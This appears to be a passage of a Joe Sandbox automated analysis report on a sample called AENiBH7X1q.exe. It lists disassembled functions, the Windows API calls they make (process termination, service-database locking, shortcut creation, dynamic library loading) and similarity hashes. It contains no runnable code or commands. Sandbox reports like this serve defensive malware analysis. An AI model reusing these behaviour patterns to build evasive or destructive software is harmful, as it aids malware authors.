                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00436055
                                                                                                                                                                                                                                                                                                                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                                                                                                                                                                                                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1690418490-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00475B71
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
• CoUninitialize.OLE32 ref: 00475D71
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk$HH
• API String ID: 886957087-3121654589
• Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
• Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
• Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
• SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 763830540-1403004172
• Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
• Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
• Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
• Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
APIs
• GetStdHandle.KERNEL32(?), ref: 004439B4
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID: *.*
• API String ID: 1795658109-438819550
• Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
• Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
• GetFocus.USER32 ref: 004609EF
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
• GetClassNameW.USER32(?,?,00000100), ref: 00460A37
• EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
• __swprintf.LIBCMT ref: 00460A7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
• String ID: %s%d
• API String ID: 991886796-1110647743
• Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
• Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
• Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
• Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _memset$_sprintf
• String ID: %02X
• API String ID: 891462717-436463671
• Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
• Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
• Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
• Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
APIs
• _memset.LIBCMT ref: 0042CD00
• GetOpenFileNameW.COMDLG32 ref: 0042CD51
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $OH$@OH$X
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3491138722-1394974532
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2449869053-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
